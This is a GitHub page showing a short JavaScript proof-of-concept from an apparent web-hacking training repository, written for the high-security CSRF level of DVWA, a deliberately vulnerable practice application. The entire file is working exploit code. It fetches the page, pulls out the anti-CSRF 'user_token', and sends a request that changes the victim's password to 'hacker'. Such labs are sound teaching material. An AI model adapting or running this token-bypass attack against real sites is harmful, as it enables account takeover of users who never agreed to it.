webhacking/csrfhigh.js at master · SecuAcademy/webhacking · GitHub

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
//
// PoC: CSRF (for DVWA high)
// Author: Bonghwan Choi (stayp05@secuacademy.com)
//

var xhr;
var dvwa_csrf_url = '/dvwa/vulnerabilities/csrf/';
req1();

function req1() {
        xhr = new XMLHttpRequest();

        xhr.onreadystatechange = req2;
        xhr.open('GET', dvwa_csrf_url);
        xhr.send();
}

function req2() {
        if (xhr.readyState === 4 && xhr.status === 200) {
                var htmltext = xhr.responseText;
                var parser = new DOMParser();
                var htmldoc = parser.parseFromString(htmltext,'text/html');

                var CSRFtoken = htmldoc.getElementsByName("user_token")[0].value;
                alert('Found the token: ' + CSRFtoken);

                xhr = new XMLHttpRequest();
                xhr.open('GET', dvwa_csrf_url + '?password_new=hacker&password_conf=hacker&Change=Change&user_token=' + CSRFtoken);
                xhr.send();

        }

}